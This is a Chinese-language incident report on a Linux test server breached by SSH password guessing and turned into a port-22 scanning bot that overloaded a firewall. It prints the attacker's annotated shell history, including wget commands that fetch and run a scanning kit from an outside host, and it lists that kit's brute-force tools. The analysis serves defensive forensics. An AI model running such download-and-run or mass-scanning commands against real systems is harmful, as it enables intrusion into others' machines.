1、從防火牆癱瘓說起
今天還沒到公司就被電話告知辦公室無法正常連接互聯網了,網速非常慢,無法正常瀏覽網頁。急急忙忙感到公司,開始查找問題。
首先排除了交換機故障,因為內部局域網正常。當ping防火牆設備時,丟包嚴重。很明顯,防火牆出了問題,撐不住了,其Web管理界面根本無法正常登陸。立即聯繫其服務商遠程查找問題,經過近3個小時的分析,得出結論是網內有兩臺主機大量發送TCP數據包,瞬間就能在防火牆上造成40萬鏈接數,大大超出了防火牆的處理能力,造成無法響應正常路由請求。我們暫且稱這兩臺機器為A和B。把這兩臺機器斷線之後,網路立刻正常了,防火牆上的鏈接數很快降低到正常水平。
主機A配置如下:
OS - RedHat Enterprise Linux Server release 6.x
部署軟件 - Tomcat,sshd, oracle
RAM - 8GB
CPU - Intel Core i3-2130
IP地址 - 172.16.111.22
主機B為客戶託管主機,具體配置不詳。
本文只對主機A進行分析處理。
通過防火牆命令行界面,抓包發現A機器瘋狂對一組IP地址進行22端口掃描。下面是抓包結果片段:
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22, packet=3, bytes=208[REPLY] 183.58.99.130:22=====>59.46.161.39:39895, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22, packet=3, bytes=208[REPLY] 183.58.99.131:22=====>59.46.161.39:33967, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22, packet=3, bytes=208[REPLY] 183.58.99.132:22=====>59.46.161.39:34117, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22, packet=3, bytes=208[REPLY] 183.58.99.125:22=====>59.46.161.39:54932, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22, packet=3, bytes=208[REPLY] 183.58.99.135:22=====>59.46.161.39:60333, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22, packet=3, bytes=208[REPLY] 183.58.99.136:22=====>59.46.161.39:52737, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52291=====>183.58.99.137:22, packet=3, bytes=208[REPLY] 183.58.99.137:22=====>59.46.161.39:52291, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46183=====>183.58.99.138:22, packet=3, bytes=208[REPLY] 183.58.99.138:22=====>59.46.161.39:46183, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:36864=====>183.58.99.139:22, packet=3, bytes=208[REPLY] 183.58.99.139:22=====>59.46.161.39:36864, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34515=====>183.58.99.133:22, packet=3, bytes=208[REPLY] 183.58.99.133:22=====>59.46.161.39:34515, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:57121=====>183.58.99.134:22, packet=3, bytes=208[REPLY] 183.58.99.134:22=====>59.46.161.39:57121, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37830=====>183.58.99.140:22, packet=3, bytes=208[REPLY] 183.58.99.140:22=====>59.46.161.39:37830, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:42742=====>183.58.99.141:22, packet=3, bytes=208[REPLY] 183.58.99.141:22=====>59.46.161.39:42742, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:55018=====>183.58.99.142:22, packet=3, bytes=208[REPLY] 183.58.99.142:22=====>59.46.161.39:55018, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46447=====>183.58.99.143:22, packet=3, bytes=208[REPLY] 183.58.99.143:22=====>59.46.161.39:46447, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22, packet=3, bytes=208[REPLY] 183.58.99.147:22=====>59.46.161.39:51039, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22, packet=3, bytes=208[REPLY] 183.58.99.146:22=====>59.46.161.39:33123, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22, packet=3, bytes=208[REPLY] 183.58.99.151:22=====>59.46.161.39:35956, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:45002=====>183.58.99.145:22, packet=3, bytes=208[REPLY] 183.58.99.145:22=====>59.46.161.39:45002, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54711=====>183.58.99.150:22, packet=3, bytes=208[REPLY] 183.58.99.150:22=====>59.46.161.39:54711, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:58976=====>183.58.99.155:22, packet=3, bytes=208[REPLY] 183.58.99.155:22=====>59.46.161.39:58976, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22, packet=3, bytes=208[REPLY] 183.58.99.157:22=====>59.46.161.39:37967, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:47125=====>183.58.99.158:22, packet=3, bytes=208[REPLY] 183.58.99.158:22=====>59.46.161.39:47125, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35028=====>183.58.99.156:22, packet=3, bytes=208[REPLY] 183.58.99.156:22=====>59.46.161.39:35028, packet=0, bytes=0
可以清晰的看到,肉雞掃描程序瘋狂掃描一個網段內的22端口。
2、查找黑客行蹤的方法
對於Linux主機,出現問題後分析和處理的依據主要是日誌。/var/log/messages、/var/log/secure都是必不可少的分析目標,然後就是.bash_history命令記錄。黑客登錄主機必然會在日誌中留下記錄,高級黑客也許可以刪除痕跡,但目前大部分黑客都是利用現成工具的黑心者,並無太多技術背景。該主機對外開放三個TCP偵聽端口:
22 sshd
80 Tomcat
1521 Oracle
這三個服務都有可能存在漏洞而被攻擊,最容易被掃描攻擊的還是sshd用戶名密碼被破解。所以最先分析 /var/log/secure日誌,看登錄歷史。
3、淪陷過程分析
3.1 oracle用戶密碼被破解
分析/var/log/secure日誌。不看不知道一看嚇一跳,該日誌已經佔用了四個文件,每個文件都記錄了大量嘗試登錄的情況,執行命令:
cat secure-20150317 | grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq
結果如下:
invalid user admin
invalid user dacx
invalid user details3
invalid user drishti
invalid user ferreluque
invalid user git
invalid user hall
invalid user jparksu
invalid user last
invalid user patrol
invalid user paul
invalid user pgadmin
invalid user postgres
invalid user public
invalid user sauser
invalid user siginspect
invalid user sql
invalid user support
invalid user sys
invalid user sysadmin
invalid user system
invalid user taz
invalid user test
invalid user tiptop
invalid user txl5460
invalid user ubnt
invalid user www
mysql from 10.10.10.1
oracle from 10.10.10.1
root from 10.10.10.1
可以看出攻擊程序不斷採用不同的賬戶和密碼進行嘗試。然後在接近尾部的地方發現如下2行,說明被攻破了。
Mar 9 20:35:30 localhost sshd[30379]: Accepted password for oracle from 10.10.10.1 port 56906 ssh2
Mar 9 20:35:30 localhost sshd[30379]: pam_unix(sshd:session): session opened for user oracle by (uid=0)
可見賬戶oracle的密碼被猜中,併成功登入系統。
3.2 黑客動作推演
下面看看黑客用oracle賬戶都做了什麼。首先複製一份oracle的命令歷史,防止後續操作丟失該記錄。
cp /home/oracle/.bash_history hacker_history
然後查看分析這個文件。 我在後面備註了黑客的想法。
1 vi .bash_profile
2 vi .bash_profile (查看.bash_profile,看變量設置,把/home/oracle/bin增加到PATH)
3 ll
4 cd /
5 vi .bash_profile
6 vi .bash_profile (執行,設置環境變量)
7 w
8 ps x (查看系統運行進程)
9 free -m (查看內存大小)
10 uname -a (查看系統版本)
11 cat /etc/issue (查看系統發行版)
12 cat /etc/hosts (查看是否有網內機器)
13 cat /proc/cpuinfo (查看CPU型號)
14 cat .bash_history (查看oracle賬戶歷史操作)
15 w (查看系統負載)
16 ls -a (查看/home/oracle/下的隱藏文件)
17 passwd (修改掉oracle賬戶的密碼)
18 exit
19 ls
20 oracle
21 sqlplus (運行sqlplus)
22 su (試圖切換到root賬戶)
23 app1123456 (猜測root密碼)
24 ls
25 su -
26 w
27 free -m
28 php -v (查看php版本)
29 exit
30 w
31 free -m
32 php -v
33 ps aux
34 ls -a
35 exit
36 w
37 free -m
38 php -v
39 cat bash_his (查看歷史命令)
40 cat bash_history
41 cat .bash_history
42 wget scriptcoders.ucoz.com/piata.tgz (下載肉雞攻擊軟件包)
43 tar zxvf piata.tgz (解壓軟件包)
44 rm -rf piata.tgz (刪除軟件包)
45 cd piata/ (切換到攻擊軟件目錄)
46 ls -a
47 chmod +x *
48 ./a 210.212 (運行攻擊軟件)
49 screen (試圖運行screen命令,發現沒有後下載它)
50 ls -a
51 wget scriptcoders.ucoz.com/screen.tgz
52 tar zxvf screen.tgz (解壓)
53 ./screen
54 exit
55 w
56 ps x
57 cd piata/ (切換到攻擊軟件目錄)
58 ls -a
59 cat vuln.txt (查看攻擊結果)
60 ls -a
61 mv vuln.txt 1.txt (保存攻擊結果)
62 ./screen -r
63 nano 1.txt (查看結果文件)
64 w
65 ps x
66 exit
67 cd piata
68 ps x
69 ls -a
70 nano 2.txt
71 exit
72 w
73 ps x
74 cd piata/
75 ls -a
76 cat
77 mv vuln.txt 2.txt (保存結果)
78 nano 2.txt
79 w
80 ps x
81 cd piata/
82 ls- a
83 cat vuln.txt
84 rm -rf vuln.txt
85 ./screen -r
86 exit
87 w
88 ps x
89 cd piata/
90 ls -a
91 cat vuln.txt
92 ls -a
93 mv vuln.txt 3.txt (保存結果)
94 nano 3.txt
95 exit
96 w
97 ps x
98 cd piata/
99 ls -a
100 cat vuln.txt
101 rm -rf vuln.txt
102 exit
103 w
104 ps x
105 cd piata/
106 ls -a
107 cat vuln.txt
108 rm -rf vuln.txt
109 rm -rf 1.txt
110 rm -rf 2.txt
111 rm -rf 2.txt.save
112 rm -rf 3.txt
113 screen -r
114 ./screen -r
115 exit
116 w
117 ps x
118 cd piata/
119 ls -a
120 cat vuln.txt
121 ls -a
122 nano vuln.txt
123 rm -rf vuln.txt
124 screen -r
125 ./screen -r
126 exit
127 w
128 ps x
129 cd piata/
130 ls -a
131 cat vuln.txt
132 nano vuln.txt
133 w
134 ls -a
135 rm -rf vuln.txt
136 screen -r
137 ./screen -r
138 exit
139 w
140 ps x
141 cd piata/
142 ls -a
143 cat vuln.txt
144 rm -rf vuln.txt
145 ps x
146 ls -a
147 ./screen -r
148 exit
149 w
150 ps x
151 cd piata/
152 ls -a
153 cat vuln.txt
154 nano vuln.txt
155 w
156 rm -rf vuln.txt
157 ./screen -r
158 exit
3.3 攻擊工具一覽
前面通過命令歷史記錄,可以看出攻擊工具軟件包為名為piata。下載來看看它的面目。
[root@localhost piata]# ll
total 1708
-rw-r--r--. 1 oracle oinstall 0 Mar 10 13:01 183.63.pscan.22
-rwxr-xr-x. 1 oracle oinstall 659 Feb 2 2008 a
-rwxr-xr-x. 1 oracle oinstall 216 May 18 2005 auto
-rwxr-xr-x. 1 oracle oinstall 283 Nov 25 2004 gen-pass.sh
-rwxr-xr-x. 1 oracle oinstall 93 Apr 19 2005 go.sh
-rwxr-xr-x. 1 oracle oinstall 3253 Mar 5 2007 mass
-rwxr-xr-x. 1 oracle oinstall 12671 May 18 2008 pass_file
-rwxr-xr-x. 1 oracle oinstall 21407 Jul 22 2004 pscan2
-rwxr-xr-x. 1 oracle oinstall 249980 Feb 13 2001 screen
-rw-r--r--. 1 oracle oinstall 130892 Feb 3 2010 screen.tgz
-rwxr-xr-x. 1 oracle oinstall 453972 Jul 13 2004 ss
-rwxr-xr-x. 1 oracle oinstall 842736 Nov 24 2004 ssh-scan
-rw-r--r--. 1 oracle oinstall 2392 Mar 10 05:03 vuln.txt
其中 a, auto, go.sh gen-pass.sh, 都是bash腳本文件,用於配置掃描網段,調用掃描程序。pscan2和ssh-scan則為掃描程序。 vuln.txt記錄獲得的肉雞列表。
目前尚未發現其他系統文件被黑客修改,也沒有自動運行攻擊軟件的設置。
4 深刻教訓
雖然這次被攻擊的機器只是一個測試主機,其本身的重要性並不高,但卻造成了防火牆的癱瘓,進而造成互聯網不能正常訪問。對此,必須引起足夠重視,並從中汲取教訓。
系統賬戶密碼一定要有一定的複雜度。這次攻擊就是由於oracle賬戶密碼過於簡單所致。
sshd採用密碼方式登錄風險很大,特別是密碼簡單的時候。可行的情況下,儘量關閉密碼方式,改用公鑰方式。
作為數據中心管理員,一定要監督監管系統管理員和軟件開發商的服務安全,本次被攻擊主機就是把所有權限都放給了網站開發公司,而開發公司對運營安全並不重視。
相關推薦
推薦中...